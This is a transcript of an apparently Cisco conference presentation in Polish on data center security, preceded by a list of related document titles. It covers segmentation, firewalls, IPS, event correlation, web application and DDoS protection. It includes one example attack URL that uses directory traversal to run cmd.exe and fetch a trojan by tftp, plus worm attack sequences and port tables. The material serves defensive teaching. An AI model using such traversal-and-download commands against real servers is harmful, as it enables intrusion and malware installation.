Bezpieczeństwo Centrum Przetwarzania Danych



Podobne dokumenty
Bezpieczeństwo mojej sieci O czym pomyśleć zanim będzie za późno Łukasz Bromirski lbromirski@cisco.com

Robaki sieciowe. + systemy IDS/IPS

Web Application Firewall - potrzeba, rozwiązania, kryteria ewaluacji.

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci

Projektowanie zabezpieczeń Centrów Danych oraz innych systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa

Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark

ZiMSK. Charakterystyka urządzeń sieciowych: Switch, Router, Firewall (v.2012) 1

Zdalne logowanie do serwerów

MODEL WARSTWOWY PROTOKOŁY TCP/IP

Cisco TCC co w praktyce oznacza SDN?

Autorytatywne serwery DNS w technologii Anycast + IPv6 DNS NOVA. Dlaczego DNS jest tak ważny?

Kompleksowe zabezpieczenie współczesnej sieci. Adrian Dorobisz inżnier systemowy DAGMA

CZĘŚĆ IV ZAMÓWIENIA OBLIGATORYJNE WYMAGANIA TECHNICZNE

9. System wykrywania i blokowania włamań ASQ (IPS)

Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego TCP

WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH

Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks

INFORMACJA O TREŚCI ZAPYTAŃ DOTYCZĄCYCH SIWZ WRAZ Z WYJAŚNIENIAMI ZAMAWIAJĄCEGO

Metody ataków sieciowych

Wirtualizacja sieci izolacja ruchu w LAN oraz sieciach MPLS

ZiMSK NAT, PAT, ACL 1

Opis Przedmiotu Zamówienia

7. Konfiguracja zapory (firewall)

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych

SPECYFIKACJA TECHNICZNA PRZEDMIOTU UMOWY DOTYCZĄCA CZĘŚCI AKTYWNEJ ŁĄCZA

Router programowy z firewallem oparty o iptables

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Monitorowanie aplikacji i rozwiązywanie problemów

Załącznik nr 02 do OPZ - Zapora ogniowa typu A

Architektura oraz testowanie systemu DIADEM Firewall Piotr Piotrowski

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Paweł Pokrywka. Radar w Ethernecie. Lokalizowanie hostów w sieci LAN

SIECI KOMPUTEROWE. Dariusz CHAŁADYNIAK Józef WACNIK

BEZPIECZEŃSTWO W SIECIACH

IP Anycast. Ochrona i skalowanie usług sieciowych. Łukasz Bromirski lbromirski@cisco.com

PARAMETRY TECHNICZNE I FUNKCJONALNE

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

1 Dostarczony system bezpieczeństwa musi zapewniać wszystkie wymienione poniżej funkcje bezpieczeństwa oraz funkcjonalności dodatkowych.

SPECYFIKACJA TECHNICZNA. LP. Parametry wymagane Parametry oferowane (pełny opis

OCHRONA PRZED RANSOMWARE

Laboratorium - Wykorzystanie programu Wireskark do badania ramek Ethernetowych

4. Podstawowa konfiguracja

dostępu do okręslonej usługi odbywa się na podstawie tego adresu dostaniemu inie uprawniony dostep

SPECYFIKACJA TECHNICZNA ZAŁĄCZNIK NR 1 DO SIWZ

Spis treúci. Księgarnia PWN: Wayne Lewis - Akademia sieci Cisco. CCNA Exploration. Semestr 3

11. Autoryzacja użytkowników

Bezpieczeństwo jako fundament budowy Społeczeństwa Informacyjnego w JST Beata Haber IS Account Manager wbeata@cisco.

CYBEROAM Unified Treatment Management, Next Generation Firewall

Księgarnia PWN: Greg Bastien, Christian Abera Degu Ściany ogniowe Cisco PIX

Palo Alto firewall nowej generacji

INSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk

Sieci komputerowe - administracja

Securing the Cloud Infrastructure

Wybrane metody obrony przed atakami Denial of Service Synflood. Przemysław Kukiełka

Metody zabezpieczania transmisji w sieci Ethernet

Podstawy bezpieczeństwa

Przełączanie i Trasowanie w Sieciach Komputerowych

Wykaz zmian w programie SysLoger

PROJEKT ARAKIS DOŚWIADCZENIA Z OBSERWACJI ZAGROŻEŃ W SIECI Tomasz Grudziecki (CERT Polska / NASK)

Praktyczne wykorzystanie mechanizmów zabezpieczeń w aplikacjach chmurowych na przykładzie MS Azure

Specyfikacja techniczna do przełączników sieciowych i firewall a Załącznik nr 4. 1) Przełącznik sieciowy typu I (np: WS-C TC-L lub równoważny)

Protokół DHCP. DHCP Dynamic Host Configuration Protocol

Wymagane jest aby system składał się z co najmniej następujących elementów:

DLP i monitorowanie ataków on-line

MONITOROWANIE DOSTĘPNOŚCI USŁUG IT

Drobne błędy w portalach WWW

Przegląd zagrożeń związanych z DNS. Tomasz Bukowski, Paweł Krześniak CERT Polska

ARCHIWUM PAŃSTWOWE W ZIELONEJ GÓRZE. Parametry graniczne i wymagalne dla sprzętu dostarczonego przez oferenta.

OUTSIDE /24. dmz. outside /24. security- level 50. inside security- level /16 VLAN /

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko

Wireshark analizator ruchu sieciowego

Specyfikacja techniczna

OCHRONA PRZED RANSOMWARE. Konfiguracja ustawień

Protokoły sieciowe - TCP/IP

ANALIZA BEZPIECZEŃSTWA SIECI MPLS VPN. Łukasz Polak Opiekun: prof. Zbigniew Kotulski

Teoria i praktyka wdrożeniowa zabezpieczeń NAC w oparciu o technologię Juniper UAC. Radosław Wal radosław.wal@clico.pl

INSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk

Marek Pyka,PhD. Paulina Januszkiewicz

Wdrażanie i zarządzanie serwerami zabezpieczającymi Koncepcja ochrony sieci komputerowej

Wirtualizacja sieci - VMware NSX

OPIS PRZEDMIOTU ZAMÓWIENIA

Przepełnienie bufora. SQL Injection Załączenie zewnętrznego kodu XSS. Nabycie uprawnień innego użytkownika/klienta/administratora

Opis przedmiotu zamówienia

Marek Krauze

Inwazja security na świat wirtualny VPN-1 VE Radosław Wal CLICO

Funkcjonalność ochrony antywirusowej w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń AV

ZiMSK. VLAN, trunk, intervlan-routing 1

IP Spoofing is still alive... Adam Zabrocki ( nie działa ;) ) pi3@itsec.pl (lub oficjalnie: adam@hispasec.com)

Wprowadzenie do zagadnień związanych z firewallingiem

Marcin Szeliga Sieć

Porty przełącznika: 8 lub więcej portów typu 10/100/1000Base-T 2 lub więcej porty SFP Gigabit Ethernet (obsługujące również moduły SFP Fast Ethernet)

Bezpieczeństwo systemów komputerowych. Laboratorium 1

Przesyłania danych przez protokół TCP/IP

Podstawy MPLS. PLNOG4, 4 Marzec 2010, Warszawa 1

SPECYFIKACJA TECHNICZNA CZĘŚĆ I PRZEDMIOTU ZAMÓWIENIA (urządzenia bezpieczeństwa) OBLIGATORYJNE WYMAGANIA TECHNICZNE

Monitorowanie zdarzeń w sieci bankowej w odniesieniu do Rekomendacji D. Bartłomiej Kilanowicz, ASCOMP

Ewolucja operatorów od dostawców bitów do dostawców usług

ZiMSK dr inż. Łukasz Sturgulewski, DHCP

Zarządzanie bezpieczeństwem w sieciach

Projektowanie sieci lokalnej (wg. Cisco)

Transkrypt:

Bezpieczeństwo Centrum Przetwarzania Danych (czyli jak do problemu podejść praktycznie) Łukasz Bromirski lbromirski@cisco.com Wrocław, 21 października 2006 1

Agenda Problemy zagrożenia i wyzwania Jak wygląda CPD? Segmentacja farmy serwerów Opcje projektowe Mechanizmy IPS Bezpieczeństwo aplikacji Zapobieganie atakom DDoS Monitoring i analiza pracy CPD 2

Problemy wyzwania i zagrożenia 3

Typowa sekwencja ataku na CPD Włamanie na serwer przez aplikację Segment L2 Segment L3 HTTP Web Server Web Server Aplikacja/frontend Baza danych Po skanowaniu, włamywacz wykorzystuje konkretną lukę (lub zestaw luk) do ataku Zwykle dochodzi do otworzenia powłoki systemowej Na przykład (skopiowanie trojana na zaatakowany system): HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c +tftp%20-i%2010.20.15.15%20get%20trojan.exe%20trojan.exe 4

Sekwencja włamania - Blaster Jednoczesne połączenie na TCP/135 w blokach po 20 IP Po dwóch sekundach wysłanie exploita DCOM do połączonych hostów Połączenie do portu 4444 Uruchomienie serwera TFTP Skopiowanie msblast.exe 135 135 4444 69 Port 4444 Wykonanie ataku Buffer Overflow i otworzenie kanału kontrolnego do powłoki na porcie 4444 Ściągnięcie msblast.exe Zamknięcie serwera TFTP Uruchomienie msblast.exe 4444 Zapisanie do rejestru Windows, Rozpoczęcie SYN Flood do windowsupdate.com od 16 sierpnia 5

Wzorce ataków, które znamy... Robak Port atakowany Port kontrolny Przesyłanie plików Zawartość Blaster 135 4444 TFTP-69 Syn-Flood MSFT Spida 1433 445 SMB-445 Email Sasser 445 9996 FTP-5554 Skan Korgo 445 113,2041,... 2000-8191 TCP Backdoors IRC Connect HTTP Download Zotob 445 8888 FTP-33333 IRC Conn-8080 6

Jak wygląda CPD? 7

Typowa topologia CPD Sieć firmy ISP A Internet ISP B Przełączniki brzegowe Przełączniki szkieletowe Przełączniki agregacyjne Przełączniki dostępowe Sekcja WWW Sekcja aplikacji Sekcja baz danych 8

Topologia dwóch połączonych CPD Active/active lub active/standby Sieć firmowa ISP A Internet ISP B Sieć firmowa Active/Active Hosting WWW Active/Active Aplikacje Active/Standby Bazy danych 9

Cisco Business Ready Data Center Kompletne rozwiązanie bezpieczeństwa SSL, IPSEC szyfrowanie 3DES/AES, identyfikacja klientów IP Layer 3 links Layer 2 links Test RPF filtrowanie zgodnie z RFC1858 filtrowanie RFC2827 Layer 3 links TCP HTTP, DNS, SMTP ARP, Ethernet VLAN web SYN cookies TCP intercept Virtual fragment reassembly Uwierzytelnianie Ograniczenie ilości połączeń do serwerów (łącznie i na sekundę) fixups, ISN randomization VLAN web, app VLAN web VLAN web, app VLAN web, app VLAN app VLAN app VLAN web VLAN app VLAN web VLAN web, app sygnatury dla serwerów pozwalają zidentyfikować próby nadużyć VLAN app PVLANy ochrona przed MAC floodingiem ochrona przed ARP-spoofingiem 10

Segmentacja w farmie serwerów 11

Po co segmentować serwery? Ograniczenie osiągalności 80 443 Zapobiega komunikacji po dowolnych portach 1434 Web Zatrzymanie możliwości pobrania robaków lub wysłania własnych informacji w niekontrolowany sposób Ogranicza propagacje Worm Exploit Port Control Port File Transfer Payload DB Blaster Spida 135 1433 4444 445 TFTP-69 SMB-445 Syn-Flood Email Info Raportowanie zdarzeń i włamań Sasser Korgo Zotob 445 445 445 9996 113,2041,... 8888 FTP-5554 2000-8191 FTP-3333 Scan Steal IRC 12

Budowa zestawu reguł ruchowych NAM per Host CSA per Proces MARS/FWSM per VLAN 13

Projektowanie segmentacji w farmie serwerów 14

Od separacji fizycznej do logicznej Monitoring, bezpieczeństwo, usługi wysokiej dostępności Serwery WWW Serwery aplikacji Serwery baz danych 15

Platforma sieciowa dla CPD Catalyst 6500 3, 4, 6, 9 lub 13 slotów po 40Gbit/s per slot, do 48Mp/s per slot w modelu rozproszonego przetwarzania do 32 tysięcy ACL obsługiwanych sprzętowo obsługa mechanizmów bezpieczeństwa L2/L3 mechanizmy CoPP duża ilość kart serwisowych w pełni modularny software 16

Catalyst 6500 Portfolio kart serwisowych Moduł FWSM Moduł VPN SPA w SCC Moduł IDS/IPS Moduł WebVPN Moduł CSM/SSL SIP 200/400/600 WSLM/WiSM PSD/CSG/MWAM Moduł komunikacji Moduł AON/ACE Moduły Guard/TAD Moduł NAM 2006 Cisco Systems, Inc. All rights reserved. Cisco Public 17

A. Model typowy 5 Gbps Szkielet Agregacja bpdu forwarding Dostęp RHI Aktywna VIPx L3 Sync Zapasowa Konfiguracja z drogą zapasową Połączenia L3 P2P do szkieletu SLB routowany na jednym interfejsie Server-to-server CSM offload PBR/sNAT dla ruchu wracającego CSM routuje ruch RHI wykorzystany do ściągnięcia ruchu Bezpieczeństwo Firewalle pracujące w L2 Wiele kontekstów (wirtualnych instancji) Pętla z aktywnym PVST+ Podwójne uplinki Połowa zasobów nieaktywna 18

B. Model active-active Aktywny Aktywny Używa kart ACE i FWSM 3.1 10 Gbps RHI L3 Load-balancing na poziomie VIP, VLAN Model active-active: Połączenia dostępowe Dostępne usługi hsrp Primary Blue STP Root Blue RHI hsrp Primary Red STP Root Red Podwaja łączną wydajność poszczególnych elementów Wymaga dostępu z pętlą w warstwie dostępowej 19

C. Zintegrowanie usług firewall i SLB Aktywny Aktywny Funkcje firewall i SLB zapewnia ACE L3 Uproszczony projekt i działanie 16 32 Gbit/s VIPx VIPy Wydajność na poziomie 16/32Gbit/s Bez pętli w dostępie Sync Możliwości karty ACE vs FWSM Śledzenie: zarówno HSRP jak i ACE śledzą dostep do aktywnych VLANów Nie wszystkie rozszerzenia i usługi zaawansowane są obsługiwane 20

D. Kanapka wykorzystująca VRF 10 Gbps global MSFC L3 W pełni funkcjonalny zestaw logicznych instancji Wydajność serwer-serwer Pomija karty FWSM i ACE w przypadku ruchu w tym samym zestawie VRFów Elastyczna topologia dostępowa L2 z pętlą 100+ Gbps VRF svr-to-svr offload L2 L3 Dostęp L2 lub L3 współdzielony VRF ip vrf BLUE rd 10:10 import 40:40 export 10:10 ip vrf GREEN rd 20:20 import 40:40 export 20:20 ip vrf SHARED rd 40:40 import 10:10 import 20:20 export 40:40 L2 bez pętli L3 21

Wykrywanie włamań i korelacja zdarzeń 22

Wykrywanie robaków Przykładowy wzorzec evidsalert: eventid=1122377757155804093 vendor=cisco severity=medium originator: hostid: ips1 time: September 20, 2005 8:04:28 PM UTC offset=0 timezone=utc signature: description= Nachi Worm ICMP Echo Request id=2158 version=s167 sigdetails: Nachi ICMP interfacegroup: vlan: 0 participants: attacker: addr: 192.30.102.158 locality=out target: addr: 192.28.214.3 locality=out actions: iploggingactivated: true logpairpacketsactivated: true iplogids: iplogid: 1701737076 triggerpacket: 000000 00 10 7B E8 0E 99 00 D0 04 AE 94 0A 08 00 45 00..{...E. 000010 00 5C B1 DC 00 00 77 01 FC E7 AC 1E 66 9E AC 1C.\...w...f... 000020 D6 03 08 00 B0 0D 02 00 F0 9C AA AA AA AA AA AA... 000030 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA... 000040 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA... riskratingvalue: 60 interface: ge0_0 protocol: icmp 2004 ICMP echo request: MS ping triggerpacket: 000000 00 05 5F E5 64 00 00 0C 29 DE B2 0B 08 00 45 00.._.d...)...E. 000010 00 3C 22 30 00 00 20 01 50 F2 0C 14 05 0A 0C 14.<"0...P... 000020 0A 6E 08 00 A6 59 02 00 A7 04 41 42 43 44 45 46.n...Y...ABCDEF 000030 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 GHIJKLMNOPQRSTUV 000040 57 41 42 43 44 45 46 47 48 49 WABCDEFGHI 23

Wykrywanie robaków Skan sieci evidsalert: eventid=1122377757155804106 vendor=cisco severity=low hostid: ips1 time: September 20, 2005 8:04:28 PM UTC offset=0 timezone=utc signature: description= ICMP Network Sweep w/echo id=2100 version=s2 subsigid: 0 interfacegroup: vlan: 0 participants: attacker: addr: 192.30.102.158 locality=out target: addr: 192.28.214.3 locality=out target: addr: 192.28.214.4 locality=out target: addr: 192.28.214.8 locality=out target: addr: 192.28.214.20 locality=out target: addr: 192.28.214.22 locality=out target: addr: 192.28.214.23 locality=out actions: droppedpacket: true deniedattacker: true riskratingvalue: 50 interface: ge0_0 protocol: icmp Mechanizmy heurystyczne pozwalają wykryć wiele rodzajów skanowania 24

Problem z systemami IDS/IPS Logi, wszędzie są logi! 25

Wizualizacja zdarzeń Cisco MARS Brązowy Czerwony Purpurowy = Atakujący = Zarażony = Zarażony i atakujący 26

Agregacja zdarzeń i incydentów 27

Robak złapany dzięki systemowi MARS 28

Możliwości raportowania systemu MARS Szukanie hostów które zaatakowano Możliwość szczegółowego zebrania informacji o konkretnych hoście 46,000 sesji 22 hostów zarażonych w ciągu ostatnich 30 dni... 29

Zapobieganie włamaniom 30

Blokowanie na drodze pakietu - inline IPS 31

Wyznaczenie indeksu RR Dokładność 0 100 Stopień zagrożenia samego zdarzenia 25 100 25 (info), 50 (low), 75 (med), 100 (high) Poziom wartości konkretnego celu 75 200 75 (low), 100 (med), 150 (high), 200 (critical) 32

Przypisywanie akcji na podstawie RR 33

Bezpieczeństwo aplikacji 34

Ataki odbywają się w warstwie aplikacji... Ponad 75% ataków odbywa się tutaj Aplikacje WWW Dostosowane lub stworzone na zamówienie Kod wewnętrzny i firmowy Logika i kod biznesowy Nie ma sygnatur czy łat Sieciowy firewall IDS IPS Serwery WWW System operacyjny Serwery aplikacji System operacyjny Sieć Serwery baz danych System operacyjny 35

Zabezpieczenie serwerów Cisco Security Agent Zintegrowany system klasy HIPS Opcje dla stacji i serwerów Windows/Linux/Solaris Pozwala na dokładną korelację od procesu tworzącego ruch sieciowy, po poszczególne elementy sieci 36

Appliance AVS 3100 - możliwości Ochrona cookies Szyfrowane Uwierzytelnione Max age Ochrona (maskowanie) pól pozwalających na kradzież tożsamości Generowanie reguł bezpieczeństwa z istniejących logów Ochrona na podstawie zgodności z protokołem HTTP Lista wspieranych metod Kontrola typów MIME (audio/mpeg/image/jpeg, etc.) Ochrona (maskowanie) specyfiki serwerów WWW Generowanie stron błędów, lub czyszczenie stron błędów aplikacyjnych Normalizacja URLi i standardu zapisu znaków, przekierowań Nakładanie limitów na zapytania ilościowych i objętościowych Zapobieganie atakom SQL injection Command injection Cross site scripting Format string attack Meta char detection LDAP injection Buffer overflow 37

AVS 3100 Opcje umieszczenia w topologii Span Port Model monitoringu OOB Łatwe do wdrożenia Zachowana widoczność ataków Monitoring per-aplikacja/vlan Tryb pracy inline Wdrożenie transparentne dla sieci, Blokowanie, logowanie, przepisywanie, przekierowanie, generowanie stron błędów, tagowanie URLi, nakładanie polityk z dokładnością do usług Model bramy Akceleracja WWW, redukcja opóźnień i optymalizacja transmisji TCP, loadbalancing w ramach klastra, terminowanie SSL, wszystkie mechanizmy dostępne w trybie inline 38

Ochrona farm serwerów przed atakami (D)DoS 39

Cele ataku (D)DoS Cel to oczywiście uniemożliwienie świadczenia usług Można to osiągnąć przez atak na: serwer urządzenie sieciowe po drodze połączenie CPD Może zostać połączone z fałszowaniem adresów źródłowych Przy okazji dostaje się również......routerom, innym systemom na drodze ataku całej infrastrukturze Tablice stanów Pasmo 40

Mechanizmy ochrony przez SYN flood SYN-Cookies Problem powodzi SYN Jeśli TCP SYN wymaga allokacji pamięci po stronie serwera, jest to atak DoS serwera Stos sieciowy TCP przetrzyma pakiet SYN w stanie SYN_RCVD do wygaśnięcia Nie trzeba fałszować żadnych danych z nagłówka w tym adresu źródłowego IP Dzięki wykorzystaniu SYN-cookies, serwer ani urządzenia sieciowe nie muszą allokować pamięci zwiększając odporność na atak DoS SYN ACK Cookie + 1 SYN ACK Cookie tworzone jako hash z pakietu SYN Odszyfrowanie i sprawdzenie cookie Nawiązanie połączenia TCP 41

DoS z punktu widzenia MARS Korelacja zdarzeń: Wewnętrzne mechanizmy MARS Informacje z systemów IPS Trafienia w reguły odrzucające pakiety w ACL systemów firewall Netflow 42

Anti-Spoofing Test urpf Mechanizm urpf wykorzystuje tablicę routingu do sprawdzenia adresu źródłowego Idealnie dostosowana do sieci budowanych w oparciu o L3 (routowanych) Źródłowy IP 10.20.5.80 Połączenia do szkieletu Outside Inside 10.20.5.0 10.20.10.0 IP Verify Unicast Source Reachable-via Rx Allow-Default 43

Moduły Cisco Guard/Anomaly Detector Ochrona przed atakami DoS/DDoS dla DC Internet O 192.168.3.0/24 [110/2] via 10.0.0.3, 2d11h, GigabitEthernet2 S 192.168.3.128/32 [20/0] via 10.0.0.2, 00:00:01 192.168.3.128 = zone 10.0.0.2 = Guard Ruch do strefy 3. Przekierowanie do Guarda 4. Filtrowanie Ruch prawidłowy 6. Ruch do innych stref nie jest modyfikowany Remote Host Injection (RHI) Podejrzany ruch Moduł Guard Moduł wykrywania anomalii 2. Aktywacja (Auto/Ręczna) 1. Wykrycie anomalii Zone 1: WWW Atakowana strefa 5. Wstrzelenie ruchu z powrotem Zone 2: Serwery DNS Zone 3: Aplikacje e-commerce 44

Monitoring sieci 45

Rozwiązywanie problemów Analiza ruchu przed i po przejściu przez CPD Przeglądarka wysyła osiem zapytań docierają tylko cztery... 46

Ocena zapotrzebowania na pasmo Istotne dla planowania urządzeń inline 47

Gdzie szukać więcej informacji? Cisco BRDC http://www.cisco.com/go/brdc Rozwiązania bezpieczeństwa Cisco http://www.cisco.com/go/security 48

Q&A 49

50